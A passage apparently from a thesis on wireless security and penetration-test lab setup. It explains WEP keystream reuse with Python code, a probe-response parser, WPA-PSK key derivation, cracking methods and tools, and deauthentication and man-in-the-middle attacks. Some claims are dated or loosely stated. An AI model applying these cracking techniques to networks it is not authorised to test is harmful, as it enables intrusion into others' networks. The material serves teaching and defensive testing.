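    return iv + xor(payload, rc4_keystream(iv + secret_key, len(payload)))


def wep_decapsulate(secret_key: bytes, frame: bytes):
    """Rebuild the key stream from the cleartext IV, strip it off, check the ICV.
    Returns the plaintext, or None when the ICV does not match (frame altered)."""
    iv, ciphertext = frame[:3], frame[3:]
    payload = xor(ciphertext, rc4_keystream(iv + secret_key, len(ciphertext)))
    plaintext, received_icv = payload[:-4], payload[-4:]
    return plaintext if received_icv == icv(plaintext) else None


def keystream_reuse_leak(frame_a: bytes, frame_b: bytes):
    """The IV-reuse problem: two frames under the same IV and key share one key
    stream, so XORing their ciphertexts cancels it and yields
    plaintext_a XOR plaintext_b with no knowledge of the secret key."""
    if frame_a[:3] != frame_b[:3]:
        return None                       # different IVs, different key streams
    return xor(frame_a[3:], frame_b[3:])


def find_iv_reuse(frames):
    """Monitoring-side check over a capture: IVs that occur more than once."""
    counts = {}
    for f in frames:
        counts[f[:3]] = counts.get(f[:3], 0) + 1
    return {iv.hex(): n for iv, n in counts.items() if n > 1}


# Constructed sample values, not taken from any real capture.
KEY = bytes.fromhex("0102030405")       # 40-bit secret key
IV_A = bytes.fromhex("000001")
IV_B = bytes.fromhex("000002")
PT_A = b"GET /index.html"
PT_B = b"PASS letmein123"
```

A monitoring tool can apply `find_iv_reuse` to the IVs of captured data frames to measure how quickly a given access point or station cycles through its 24-bit IV space.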
Although it is not a security issue, WEP encryption can reduce the usable bandwidth.
The 40-bit encryption reduces bandwidth by 1 Mbps, and 128-bit encryption reduces
bandwidth by 1 to 2 Mbps. This degree of drop is relatively small, but users still notice it,
especially if the signal is transmitted via FHSS, which transmits signals at a maximum of
only 3 Mbps [Arbaugh 2003].
WEP also provides means to authenticate users trying to connect to an access
point. Basically, it has two types of authentication: “a default Open System, whereby all
users are permitted to access a WLAN, and shared key authentication, which controls
access to the WLAN and prevents unauthorized network access” [Nichols 2002]. Of the
two levels, shared key authentication is the secure mode. It works by sharing a secret key
among all stations and Access Points in a WLAN system. When a station tries to
associate with an AP, the AP replies back with random text by way of a challenge. The
station must use its copy of the shared secret key to encrypt the challenge text and send it
back to the AP in order to authenticate itself. The AP decrypts the response using the
same shared key and compares it to the challenge text sent earlier. If the text is identical,
the AP sends a confirmation message to the station and accepts the station into the
network. Figure 1.10 shows the shared key authentication process [Cam-Winget 2003].
Figure 1.10 Shared Key Authentication [WildPackets 2007]
Shared Key authentication works only if WEP encryption is enabled. If it is not
enabled, the system will default to the Open System mode, permitting almost any station
within range of an AP to access the network. The problem with this method of
authentication is the distribution of the key. Most WLANs share one key among all
devices and Access Points in the network. It is improbable that a key shared among many
users will remain secret indefinitely. A partial solution to this problem is to have the
secret key configured on the wireless stations for the users, rather than permitting end
users to perform this task. The problem with this solution is that the shared key is still
stored on the users’ computers, where it is vulnerable [Walker 2000].
In addition, if a key on even one station is compromised, all the other stations in
the system must be reconfigured with a new key. A better solution is to assign a unique
key to each station and to change them frequently. Furthermore, in many WLAN
systems, the key used for authentication is the same key used for encryption, creating a
dual threat. The solution is to distribute separate keys throughout the system: one for
authentication and another for encryption [Walker 2000].
1.2.3 Wi-Fi Protected Access
Because Wired Equivalent Privacy (WEP) has been found to be highly
flawed, to the serious detriment of its security claims and supporters, the Wi-Fi Alliance,
the industry group that promotes interoperability and security for the wireless LAN
industry, created the Wi-Fi Protected Access (WPA) standard, which was intended to
replace WEP. In addition, the IEEE 802.11i standard incorporates the WPA encryption
method [Cam-Winget 2003].
WPA allows for two kinds of authentication: WPA-802.1x (also known as
WPA-Enterprise) and WPA-PSK (also known as WPA-Home). The first one uses a Remote
Authentication Dial-in User Service (RADIUS) server on the network. A RADIUS server
“is a certificate authenticator that only allows client stations to connect with the Access
Point (AP) if it sees a valid certificate on the client, which the server provided earlier”
[Housley 2003]. This use of WPA is generally for medium to large businesses, and is
generally not used in small office/home office (SOHO) environments [Housley 2003].
For SOHO environments WPA-PSK is a better choice. It uses a pass-phrase,
which is between 8 and 63 characters long. This pass-phrase is created and entered by the
user into any client station’s configuration utility, as well as into the AP. The way to
authenticate a user is through the Extensible Authentication Protocol (EAP). This
process leaves two considerations: the access point still needs to authenticate itself to the
client, and keys to encrypt the traffic need to be derived [Housley 2003].
1.3 Wireless Penetration Testing
As mentioned before, a penetration test offers an invaluable and compelling way
to establish a baseline assessment of security as seen from outside the boundaries of the
organization’s network. If executed properly, penetration tests provide evidence that
vulnerabilities do exist and that network penetrations are possible. More importantly,
they provide a blueprint for remediation in order to start or enhance a comprehensive
information protection strategy [INSIGHT 2008].
Penetration tests require certain key elements to be in place in order to ensure
useful, timely results. First, they must cover the full range of the threat spectrum, from
the presence of an antivirus engine to the more sophisticated vulnerabilities that might
enable denial of service attacks. Also, they must deliver clear, unambiguous results that
address both the technical and business objectives of the client. There exist
methodologies that the consultants need to follow. Furthermore, the most up-to-date
software should be used with the goal to gain maximum results with minimal disruption
to normal business operations [Beaver 2005].
The first step in deploying a penetration test is planning. There has to be a well
defined and ordered plan before starting to test the wireless network for security
vulnerabilities. It is critical to plan everything in advance. This includes [Beaver 2005]:
• Permission to perform the tests from the boss, project sponsor, or client.
• Testing goals.
• Tests to run.
Ethical hacking is more than just running a wireless-network analyzer and scanning
for open ports. There are some formal procedures that should be incorporated into the
testing plan [Beaver 2005]. A well-thought-out professional attack against a wireless
network is likely to flow in the following sequence [Vladimirov 2004]:
1. Enumerating the network and its coverage area via the information available
online and from personal contact and social engineering resources.
2. Planning the site survey methodology and attacks necessary to deploy against the
network.
3. Assembling, configuring, setting and checking all the hardware devices and
software tools needed to carry out the attacks.
4. Surveying the network site and determining the network boundaries and signal
strength along the network perimeter. Establish the best sites for stationary attacks
by finding a site where the signal strength and the signal-to-noise ratio (SNR) are
high, and the physical stealth factors such as site visibility and reachability by
security guards and CCTV are low.
5. Analyzing the network traffic available. Determine whether the traffic is
encrypted or not, and how high the network load is.
6. Trying to break the discovered safeguards. This might involve bypassing MAC
and protocol filtering, determining closed ESSIDs, cracking WEP, and defeating
higher layer defensive countermeasures.
7. Scanning and discovering all detectable hosts on both the wired and wireless
networks.
8. Passively enumerating these hosts and analyzing security of protocols present on
the wireless and connected wired LANs.
9. Actively enumerating interesting hosts found and launching attacks against them
aimed at gaining top level accounts and privileges.
1.3.1 Determining What Others Know
The first formal step in the ethical-hacking methodology is to perform a high-
level network reconnaissance called footprinting. By looking at the targeted network
from an outsider’s perspective, the goal is to find out what is available to just about
anyone. The important information to search for is [Beaver 2005]:
• Radio Signal strength
• Specific SSIDs that are being broadcast
• IP addressing schemes
• Encryption method used such as WEP or WPA
• Hardware makes and models
• Software versions
1.3.2 Mapping the Network
After finding out what the general public can find out about the network, the next
step is to create a network map to show how the network is laid out. It is important to
map the network from both inside and outside. This allows the ethical hacker not only to
see internal and external configuration information but also to see configuration
information specific to wireless radio waves that are transmitted both inside and outside
the network [Puneet 2008].
1.3.3 Scanning the System
The next step is to perform port scanning or enumeration on the wireless network in
order to find more in-depth information about the system. Enumeration involves listing
and identifying the specific services and resources that a target offers. This detailed
information about the system gives hackers what they need to try to exploit many
potential vulnerabilities. By connecting to the ports on the system, the penetration tester
can obtain information such as [Puneet 2008]:
• Acceptable usage policies and login warnings on banner pages.
• Software and firmware versions.
• Operating-system versions
• Configuration of operating systems and applications.
Table 1.1 outlines the ports that are often found open and vulnerable to attack.
Table 1.1 Commonly Hacked Wireless Network Ports [Beaver 2005]:
Port Numbers    Service                                            Protocols
20              FTP data                                           TCP
21              FTP control                                        TCP
22              SSH                                                TCP
23              Telnet                                             TCP
25              SMTP (Simple Mail Transfer Protocol)               TCP
53              DNS (Domain Name Server)                           UDP
80              HTTP (Hypertext Transfer Protocol)                 TCP
110             POP3 (Post Office Protocol version 3)              TCP
135             RPC/DCE end point mapper for Microsoft networks    TCP, UDP
137, 138, 139   NetBIOS over TCP/IP                                TCP, UDP
161             SNMP (Simple Network Management Protocol)          TCP, UDP
443             HTTPS (HTTP over SSL)                              TCP
1.3.4 Performing a Vulnerability Assessment
After finding potential “holes” or “windows” into the wireless network, the next
step is to see whether bigger vulnerabilities exist. This can be done manually or using
automated tools such as Nessus or LAN Guard for Microsoft operating systems or
Baseline for Linux operating systems. These tools take a lot of the legwork out of
vulnerability assessment, giving the penetration tester more time to spend planning the
last step [Hassell 2004].
1.3.5 Penetrating the System
The last step of the ethical-hacking methodology is the system-penetration phase. This is
the true test of what systems and information can actually be compromised on the
wireless network. With all the information gathered about the wireless network, systems
running and vulnerabilities, the ethical hacker will try to access the resources on the
wireless network without having the right permission, just as a malicious hacker would.
All the attacks and tools described before will be used to do the penetration testing
[Hassell 2004].
WarDriving and Site Surveying
Wardriving is the activity of driving through any city or populated area, sampling
the airwaves for wireless access points. This activity is not illegal as long as the attacker
does not abuse the found networks’ resources and does not eavesdrop on data traffic.
However, site surveying is very different from casual wardriving. Site surveying is
considered to be the initial stage of penetration testing and security auditing. A surveyor
concentrates on a specified network and studies it in great detail. The site survey serves
four major security-related aims [Hurley 2007]:
• Finding out where the attackers can physically position themselves.
• Detecting rogue access points and neighbor networks.
• Baselining the interference sources to detect abnormal levels of interference in
the future, such as the interference intentionally created by a jamming device.
• Distinguishing network design and configuration problems from security-related
issues.
There are several wireless network mapping and signal monitoring tools available
in the market and most of them are free [Hassell 2004].
The most common tool for active scanning is NetStumbler, closed-source
software that performs active scanning by sending a probe request frame and waiting
for probe responses to come back. These probe response frames are dissected to show the
network ESSID, channel, the presence of WEP, signal strength, and supported bitrates
[Hurley 2007].
When NetStumbler locates a network, it records the following information [Siles
2007]:
• The signal, noise, and signal-to-noise ratio (SNR) of the discovery.
• The operating channel.
• Basic SSID (BSSID), which is actually the MAC address of the access point.
• Service Set Identifier (SSID) which is the unique identifier for the network.
• The access point’s name.
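The header fields listed in Section 1.1.2 and the probe response dissection that NetStumbler performs, made concrete in an added Python example (written for this page; it is not code from the thesis, NetStumbler or any other tool named here). The decoder reads the 802.11 management header and the beacon/probe response body; the frames it parses are constructed in the code, not real captures, and the authorized-BSSID list is a constructed placeholder.

```python
import struct

# Management (type 0) subtypes relevant to discovery tools; names per IEEE 802.11.
MGMT_SUBTYPES = {0: "Association Request", 1: "Association Response",
                 4: "Probe Request", 5: "Probe Response", 8: "Beacon",
                 10: "Disassociation", 11: "Authentication",
                 12: "Deauthentication"}


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_header(frame: bytes) -> dict:
    """Decode the 24-byte 802.11 MAC header: version, type/subtype, the flag
    bits (To/From DS, retry, protected, order), duration, the three address
    fields carried by management frames, and the sequence/fragment numbers."""
    fc, duration, a1, a2, a3, seq = struct.unpack("<HH6s6s6sH", frame[:24])
    flags = fc >> 8
    return {
        "version": fc & 0x3,
        "type": (fc >> 2) & 0x3,
        "subtype": (fc >> 4) & 0xF,
        "to_ds": bool(flags & 0x01),
        "from_ds": bool(flags & 0x02),
        "retry": bool(flags & 0x08),       # this frame is a retransmission
        "protected": bool(flags & 0x40),   # WEP/WPA-encrypted body (data frames)
        "order": bool(flags & 0x80),
        "duration": duration,
        "addr1": mac_str(a1), "addr2": mac_str(a2), "addr3": mac_str(a3),
        "fragment": seq & 0xF,
        "sequence": seq >> 4,
    }


def parse_ies(body: bytes) -> dict:
    """Walk the tag/length/value information elements; stop at a truncated one
    rather than reading past the end of the frame."""
    ies, i = {}, 0
    while i + 2 <= len(body):
        tag, length = body[i], body[i + 1]
        value = body[i + 2:i + 2 + length]
        if len(value) < length:
            break
        ies[tag] = value
        i += 2 + length
    return ies


def parse_probe_response(frame: bytes) -> dict:
    """Pull out what a discovery tool displays: ESSID, BSSID, channel, whether
    the privacy (encryption) bit is set, supported rates. Also accepts beacons."""
    hdr = parse_header(frame)
    if hdr["type"] != 0 or hdr["subtype"] not in (5, 8):
        raise ValueError("not a beacon or probe response")
    _timestamp, interval, capability = struct.unpack("<QHH", frame[24:36])
    ies = parse_ies(frame[36:])
    ssid = ies.get(0, b"")
    return {
        "frame": MGMT_SUBTYPES[hdr["subtype"]],
        "bssid": hdr["addr3"],
        "sequence": hdr["sequence"],
        "essid": ssid.decode("utf-8", "replace") if ssid else None,  # None: closed/hidden SSID
        "channel": ies[3][0] if len(ies.get(3, b"")) == 1 else None,  # DS Parameter Set
        "privacy": bool(capability & 0x0010),   # capability bit 4: WEP/WPA in use
        "rates_mbps": [(r & 0x7F) / 2 for r in ies.get(1, b"")],
        "beacon_interval_tu": interval,
    }


def classify_ap(info: dict, authorized_bssids) -> str:
    """Site-survey check: a seen BSSID is either on the authorized list or a
    rogue/neighbor access point that deserves a closer look."""
    return "authorized" if info["bssid"] in authorized_bssids else "rogue-or-neighbor"


def build_probe_response(bssid: bytes, ssid: bytes, channel: int, privacy: bool) -> bytes:
    """Constructed sample frame for exercising the parser (not a real capture)."""
    fc = 5 << 4                                  # version 0, type 0, subtype 5
    client = bytes.fromhex("0011223344aa")       # constructed destination address
    hdr = struct.pack("<HH6s6s6sH", fc, 0x013A, client, bssid, bssid, 100 << 4)
    capability = 0x0001 | (0x0010 if privacy else 0)   # ESS, optional Privacy
    body = struct.pack("<QHH", 0x1234, 100, capability)
    body += bytes([0, len(ssid)]) + ssid                 # SSID element
    body += bytes([1, 4, 0x82, 0x84, 0x8B, 0x96])        # rates 1, 2, 5.5, 11 Mbps
    body += bytes([3, 1, channel])                       # DS Parameter Set
    return hdr + body


SAMPLE = build_probe_response(bytes.fromhex("00112233aabb"), b"ExampleNet", 6, True)
HIDDEN = build_probe_response(bytes.fromhex("00112233ccdd"), b"", 11, False)
```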
Another useful wireless network discovery tool is AiroPeek, a commercial
wireless network traffic and protocol analyzer from WildPackets, Inc. AiroPeek offers
multiple features for monitoring and troubleshooting wireless LANs, including [Hurley
2007]:
• Full decodes of packets for 802.11a, 802.11b, and 802.11g.
• A security audit template with pre-defined filters.
• Scan by channel, ESSID or BSSID.
• Displays of data rate, channel and signal strength for each packet.
One of the most common open source tools for wardriving is Kismet. As mentioned
before, Kismet is a universal 802.11 sniffer that has come a long way from a wardriving
tool to a full-blown protocol analyzer and Intrusion Detection System (IDS) suite. Kismet
can detect other scanning programs like NetStumbler, detect Cisco products by using CDP,
detect if there is IP blocking, and discover “closed” or “hidden” SSIDs for access points
where SSID broadcast is disabled. Furthermore, with a GPS driver, Kismet can map access
point locations [Hurley 2007].
WEP cracking
As described before, WEP is problematic since it uses only 24 bits for its IV value
range. Eventually the same IV will be used for different data packets. Key streams,
therefore, repeat, and all an attacker needs to do is to collect data frames for an
extended period using the tools to analyze the traffic and then run a WEP cracking tool.
Another method is to collect unique IVs. With both of these methods the penetration
tester must collect a large number of WEP-encrypted packets. The newer PTW attack
requires considerably fewer packets [Walker 2000].
FMS attacks are based on the weakness in WEP’s implementation of the RC4
encryption algorithm. To successfully crack the WEP key initially the penetration tester
must collect somewhere between 5 and 10 million packets to capture around 3,000 weak
IVs. Sometimes the attack can be successful with as few as 1,500 weak IVs, and
sometimes it will take more than 5,000 before the crack is successful [Walker 2000].
Another method also relies on the collection of a large number of encrypted
packets. The chopchop attack is a “method of chopping the last byte off the packet and
manipulating it, which enables one to determine the key by collecting unique IVs instead” [Walker
2000]. The chopchop attack reduces the number of packets needed to be collected from
the millions to the hundreds of thousands [Walker 2000].
The third and newest attack is the Pychkine/Tews/Weinmann (PTW) attack, which
no longer needs unique IVs. Therefore, a significantly reduced number of
packets needs to be collected to crack WEP, as the IVs can be randomly chosen.
Using this technique, the probability of success in cracking WEP is 50 percent with as
few as 40,000 packets, and cracking time is reduced to mere minutes [Puneet 2008].
The most commonly used WEP cracking tool is AirSnort which has a very
intuitive interface and is straightforward to use. The number of packets required to crack
a WEP key is somewhere between 5 and 10 million packets, but once this amount of
packets has been gathered, it takes less than one second to identify the key [Vladimirov
2004].
Another popular tool is WepAttack which is an open source tool. WepAttack uses
brute-forcing or dictionary attacks to find the right key from the encrypted data pcap
dump file. The advantage of this tool is that it only requires one WEP-encrypted data
packet to start an attack. The possibility to crack WEP without collecting massive
amounts of encrypted data makes the dictionary attacks against 802.11 networks still
using WEP a serious threat [Vladimirov 2004].
Attacks against WPA
Unlike attacks against WEP, attacks against WPA do not require a large number
of packets to be collected. In fact, the attack can be done offline, without being in range
of the target access point. It is also important to note that attacks against WPA can be
successful only when WPA is used with a preshared key. WPA-RADIUS has no known
vulnerabilities. The main idea behind this attack is to capture the four-way Extensible
Authentication Protocol Over LAN (EAPOL) handshake. Then an extensive word
list is tried, in which each word has to be hashed 4,096 times using the HMAC-SHA1 hash
function. To have a reasonable chance of success, the preshared key should be shorter
than 21 characters [Vladimirov 2004].
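The passphrase-to-key step that both WPA-PSK configuration (Section 1.2.3) and the offline word-list attack above revolve around is the PBKDF2-HMAC-SHA1 derivation over the SSID defined in IEEE 802.11i, shown here as an added Python example (not code from the thesis or from any tool it names). The SSIDs and passphrases are constructed values, apart from the "password"/"IEEE" pair, which is a published 802.11i test vector.

```python
import hashlib


def wpa_passphrase_ok(passphrase: str) -> bool:
    """IEEE 802.11i passphrase rule: 8 to 63 printable ASCII characters."""
    return 8 <= len(passphrase) <= 63 and all(0x20 <= ord(c) <= 0x7E for c in passphrase)


def wpa_psk_pmk(passphrase: str, ssid: str) -> bytes:
    """PSK, used directly as the Pairwise Master Key:
    PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    These 4096 HMAC-SHA1 rounds per output block are the per-word cost that an
    offline word-list attack has to pay for every candidate passphrase."""
    if not wpa_passphrase_ok(passphrase):
        raise ValueError("WPA passphrase must be 8-63 printable ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), 4096, dklen=32)


def pmk_per_ssid(passphrase: str, ssids) -> dict:
    """The SSID is the salt: one passphrase gives unrelated PMKs on different
    networks, so a precomputed table is only valid for the SSID it was built for
    (which is why a unique SSID raises the attacker's cost)."""
    return {s: wpa_psk_pmk(passphrase, s).hex() for s in ssids}


def hmac_sha1_calls_per_candidate(dklen: int = 32) -> int:
    """Work per candidate word: 4096 iterations for each 20-byte SHA-1 output
    block; a 32-byte PMK needs two blocks, i.e. 8192 HMAC-SHA1 invocations."""
    blocks = -(-dklen // 20)
    return 4096 * blocks
```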
Denial of Service Attacks
Wireless networks are vulnerable to this type of attack for two
main reasons. The first one is the lack of frame authentication in 802.11 management
frames such as beacons, association requests, and probe responses. The functionality in the
MAC layer of these networks allows wireless systems to discover, join, and basically
roam freely. This implicit trust among wireless systems makes it easy for attackers to spoof
legitimate devices and bring down individual hosts. The second reason is the lack of
physical boundaries for radio waves [Bellardo 2003].
The main objective of any denial of service attack (DoS) is to prevent users from
accessing network resources. The most common methods of triggering DoS attacks are to
flood a network with degenerate or faulty packets, crowding out legitimate traffic and
causing systems not to respond. Although this type of attack can also be performed in
wired networks, wireless systems are particularly susceptible to DoS attacks because of
the way different layers of the OSI stack interact with one another [Hassell 2004].
An attack on the physical layer of a wireless network is much easier than an
attack on the physical layer of a wired network because the physical layer of the wireless
network is the air, the general vicinity around a particular access point. Attackers do not
need to gain access to the internal corporate network; they can begin their attack from a
car or even a nearby restaurant, depending on how the corporate access point is laid out.
Also, from a forensics investigator’s point of view it is more difficult to discern whether
or not a physical DoS attack has occurred, since there is no real evidence [Bellardo 2003].
There are several ways to create a DoS attack. An attacker can manufacture a
device that will flood the 2.4 GHz spectrum with noise and illegitimate traffic. For
instance, wireless security cameras, Bluetooth systems, baby monitors, microwave ovens,
and even some poorly designed 2.4 GHz cordless phones can cause interference at 2.4 GHz,
the range in which 802.11b wireless networks operate [Hassell 2004].
At the data link layer of the OSI stack, again attacks are simpler to launch against
wireless systems than against traditional wired networks. One of the most common ways
to mount an attack against the data link layer is through the manipulation of diversity
antennas. Another issue with the data link layer is spoofed access points. Since clients
are typically configured to associate with the access point with the strongest signal, an
attacker can simply spoof the SSID of an access point and clients will automatically
associate with it and pass frames back [Hassell 2004].
Although there are several ways to create a Denial of Service (DoS) attack, one
common tool is a frame-generation tool such as Void11. This tool was designed for data
link layer DoS resilience testing. Void11 can generate three types of frames, namely,
deauthenticate, authenticate, and associate. Floods of authentication and association
requests can crash or freeze some access points by filling up the buffer space assigned for
handling and processing these requests [Beaver 2005].
Man-in-the-middle Attacks
Similar to DoS attacks, man-in-the-middle attacks on a wireless network are
significantly easier to mount than against wired networks. The reason is that typically
such attacks on a wired network require some sort of access to the network. Man-in-the-
middle attacks take two common forms: eavesdropping and manipulation. In
eavesdropping, an attacker just listens to a set of transmissions to and from different hosts
even though the attacker’s computer is not part of the transaction. On the other hand,
manipulation attacks change the contents of the intercepted data
stream to suit a certain purpose [Bayles 2007].
This attack can happen in various ways, such as ARP poisoning, where the
attacker manipulates the operating system, router, and switch ARP tables in order to
spoof the victim’s MAC address. Another way is port stealing, where an attacker can
spoof packets by setting the source address to his victim’s address and the destination
address to his own address. There are various tools that hackers use to create MITM
attacks. The most popular MITM tools are open source tools for the UNIX/Linux and
Windows platforms [Bayles 2007].
AirJack is a device driver, or suite of device drivers, for raw 802.11 (a/b/g) frame
injection and reception. It was originally a custom driver for Prism II chipset cards.
AirJack's main functionality is built around its ability to send 802.11 deauthentication
frames, and the attack utilities included with it implement a Layer 2 man-in-the-middle
attack [Beaver 2005].
As shown, knowledge of all these attacks and of the tools used to perpetrate them is
essential to the forensic investigator. By covering how each of these attacks is carried out
and the features of the tools involved, the forensic investigator gains a deep understanding
of how to conduct an investigation and, furthermore, of how to determine what type of
attack has been deployed against the wireless network [Hassell 2004].
2. NARRATIVE
The very idea of a wireless network introduces multiple avenues for attack and
penetration that are either much more difficult or completely impossible to execute
against a standard wired network. Wireless networks know only the boundaries of their
own signal, so streets, parks and nearby buildings all offer a virtual port into the network.
There is a general misconception that only large enterprises are at risk from cracking.
This is a myth, but it is very prevalent. Large corporations are where the money and
sensitive data are; however, a common error is to consider small enterprises and even
home user networks to be outside the cracker's scope because they are not interesting and
have low value for an attacker. Small business and home networks provide the cracker
with anonymous access, a low probability of getting caught, free bandwidth, and ease of
breaking in [Vladimirov 2004].
Security managers need to understand these issues in order to overcome them, and
they also need to know the tools that attackers use when attacking a wireless network. By
reviewing how professional ethical hackers conduct a wireless penetration test and the
tools available for conducting an effective wireless investigation, a security manager will
gain a deep understanding of which tools should be used in which situations. Many tools
are available for learning how to do penetration testing; however, few targets are available
against which to practice pen testing safely and legally [Bayles 2007].
Many people learn penetration tactics by attacking systems on the Internet.
Although this might provide a wealth of opportunities and targets, it is highly dangerous
because it is illegal. Many people have gone to jail or paid huge fines for hacking Internet
sites. For security managers, trying to learn on their live corporate systems is equally
inadmissible [Bayles 2007].
The only real and safe option for those who want to learn penetration testing
legally is to build a penetration test lab. There is, however, the added difficulty of creating
real-world scenarios to practice against, especially for those who do not know what a
real-world scenario might look like. This obstacle is often daunting enough to discourage
many from learning how to conduct a penetration test [Bayles 2007].
2.1 Setting Up a Penetration Test Lab
One of the biggest mistakes people make when building a lab is to use systems
connected to the Internet or to their corporate intranet. Much of what occurs during a
penetration test can be harmful to networks and systems if the test is performed
improperly: a penetration tester can shut down an entire network, cutting the company
off from revenue and damaging its public image with customers.
2.1.1 Isolating the Pen-test Lab
The best illustration of this point is the case of Robert Tappan Morris, a student at
Cornell University in 1988 [Bayles 2007]. Morris released what is considered to be the
first worm on the Internet. "He created the worm to try to discover how large the Internet
was at the time, and as he has stated his intentions were not malicious" [Bayles 2007].
However, the worm jumped from system to system, copying itself multiple times, and
each copy tried to spread itself to other systems, creating a denial-of-service attack
against the entire Internet. The total damage was estimated at between $10 million and
$100 million. Morris was tried in a court of law and convicted. This example makes it
clear that anyone dealing with anything remotely hazardous to a network should be
extremely paranoid and think of security first [Bayles 2007].
Since penetration testing can be a hazardous activity, it is vital that a penetration
test lab be completely isolated from any other network. This creates some problems, such
as having no Internet connection to look up vulnerability and exploit information or to
download patches, applications and tools. However, to guarantee that nothing leaks out of
the lab network, the penetration tester must take every precaution to ensure that it does
not communicate with any other network. This becomes problematic when the lab
contains wireless equipment: how does one isolate a pen-test lab with wireless access
from other networks? [Bayles 2007].
In a penetration test involving a wireless network, the penetration tester first
needs to gain access to the network. It does not matter whether that access is gained via
the wireless portion of the network or through a plug in the wall; all that matters is that
access is established. Once access is accomplished, the penetration tester moves on to
selecting targets using techniques that work over either wireless or wired networks. So, in
order to isolate a pen-test lab with wireless access, the penetration tester needs two
separate labs [Bayles 2007]: a wireless lab in which the penetration tester practices
breaking into the wireless access point, and another lab in which the penetration tester
conducts the system attacks. That way, all subsequent attacks are isolated and do not
expose other networks [Bayles 2007].
However, in the many situations in which other wireless access points are in the
vicinity of the wireless test lab, the penetration tester must be extremely careful that the
attacks deployed hit only the pen-tester's own lab and no other wireless network. The
good news is that the standard practice for wireless attacks is to pinpoint them at the
access point using the Media Access Control (MAC) address (the BSSID) unique to the
access point used in the lab [Bayles 2007]; the --bssid filter of airodump-ng and the -a
option of aireplay-ng, both discussed later, exist for exactly this purpose.
2.1.2 Securing from Unauthorized Access
Once all the precautions to isolate the pen-test lab are in place, the second step is to
secure the lab from unauthorized access. Because the penetration test lab should simulate
the customer's network as closely as possible, gaining access to the pen-test lab is almost
as valuable as gaining access to the production network. Furthermore, it is important to
secure the installation media and to verify the integrity of all files and software used in
the pen-test lab.
An effective way for the pen-tester to verify the integrity of a file is to use a
cryptographic hash function. Once the pen-tester has downloaded a file, he must verify
that he has a true copy by computing an MD5 hash of it and comparing the result to the
value published by the file's author [Bayles 2007]. Two caveats apply: MD5 collisions
are practical today, so a published SHA-256 (or a signed checksum file) should be
preferred whenever the author offers one, and a checksum fetched from the same server as
the file only detects corruption in transit, not a compromised server.
2.1.3 Managing Storage Devices
Another precaution a pen-tester should take is to design a safe way to bring data
into the lab. Once the pen-test lab is completely isolated, the only way to bring patches,
code or files into it is on CDs, DVDs or thumb drives. However, to prevent viruses that
may have spread across the pen-test lab network from leaking out, these storage devices
should be used in read-only mode, and all CDs and DVDs should be closed (finalized)
after the desired data has been written [Bayles 2007].
Furthermore, improper labeling can become a huge problem, especially if
someone who is not part of the team picks up a CD or DVD that contains malicious
software. Finally, after all tests are finished it is important to document all findings.
A pen-tester should be careful to write, transport and archive this information securely.
All other security efforts are meaningless if a malicious person can acquire the final
pen-test report, with all the glaring deficiencies and exploitable vulnerabilities
summarized along with the specific steps needed to bring the target network to its knees
[Bayles 2007].
2.2 Types of Penetration Test Labs
Before starting to build the pen-test lab it is important to ensure that the pen-tester
has the right equipment for the task. Knowing exactly what kind of lab is needed saves
time and money. There are five possible types [Bayles 2007]:
• The virtual pen-test lab
• The internal pen-test lab
• The external pen-test lab
• The project-specific pen-test lab
• The ad hoc lab
2.2.1 Virtual Pen-Test Lab
The virtual pen-test lab is the smallest lab the pen-tester can build, and it is meant
for those just starting to learn how to conduct a penetration test. If the main goal of the
project is to learn how to attack a system, without worrying about navigating through a
network, virtualization software that can emulate multiple operating systems provides a
wealth of possibilities. Virtualization software has become quite complex and versatile in
the past few years [Bayles 2007].
However, some of today's more sophisticated viruses check for virtualization
before launching their malicious payload. This means that attacks that rely on this kind of
virus will not work against a virtual server, or the pen-tester will not get the expected
results. Since a virtual pen-test lab cannot reflect the real-world networks of today's
corporate environments, most beginner labs consist of two systems connected through a
router: one system is the target, the second is the penetration tester's machine, and the
router provides network services such as Domain Name System (DNS) and Dynamic
Host Configuration Protocol (DHCP) [Bayles 2007].
2.2.2 Internal Pen-Test Lab
This setup is called an internal pen-test lab because the penetration tester is given
internal network access. The objective of this lab is to see exactly what vulnerabilities
exist on the corporate network, not whether someone can break into the network; it is
assumed that someone with enough time on his hands will eventually succeed in getting
in. The main goal of an internal penetration test is to find out exactly what an intruder
could grab once inside [Bayles 2007].
Figure 2.1 A Sample Internal Pen-test lab
2.2.3 External Pen-Test Lab
To test vulnerabilities related to how an intruder can get into the corporate
network, the lab to use is the external pen-test lab. This type of lab follows the principle
of defense in depth, which means that the lab needs to include a firewall as a bare
minimum. Designed to keep the bad guys out, a firewall can be a difficult boundary to
get past. There are exceptions, however: it often becomes necessary for firewall
administrators to create gaps in the firewall that allow traffic to enter and leave the
network unfettered, and sometimes holes are left open by accident or in expectation of a
future need. Figure 2.2 shows a sample external pen-test lab [VAC 2008].
Figure 2.2 A Sample External Pen-test Lab
In external penetration tests, the objective is to see whether there is a way to
penetrate past the various obstacles in the network and gain access to a system behind
these defenses. Other defenses include a Demilitarized Zone (DMZ), proxies, Network
Address Translation (NAT), network intrusion detection systems, and more. Of course,
the more defenses, the closer the pen-tester gets to mimicking real-world corporate
networks [VAC 2008].
2.2.4 Project-Specific Pen-Test Lab
Sometimes it is imperative to create an exact replica of the target network. This
might be necessary because the production network is so sensitive that management
cannot risk any downtime. In this case the pen-test team needs access to the same
equipment as is available in the target network. Project-specific pen-test labs are rarely
created because of their cost, but they do exist. Extreme care is needed when building
this type of lab: the production network must be replicated accurately, since the
pen-tester may get invalid test results if the test lab is not exactly the same as the
production network [VAC 2008].
2.2.5 Ad Hoc Lab
The last type of lab is the ad hoc lab. It is often used to test one specific thing on
a server, such as a new patch, or when traffic needs to be sniffed to see whether there are
any changes in what is being sent. This type is used frequently even when a more formal
lab setup would be required. An ad hoc lab is really a shortcut and should be the
exception to standard practice; a formal process should exist to determine exactly which
type of lab is needed for each penetration test project [VAC 2008].
2.3 Pen-Test Lab Description
For the purpose of this project, the external pen-test lab and the internal pen-test
lab were used. The external pen-test lab was used to show how a wireless network can
become a backdoor into the main network, and the internal pen-test lab was used to
address the most common configuration flaws. These two labs were created in the
Network Security Lab following all the steps described above. After defining which test
labs were suitable for the project, the second step was to select the right hardware.
2.3.1 Hardware Description
One of the most important hardware components needed for wireless penetration
testing is the wireless card. The main technical challenges of wireless penetration testing
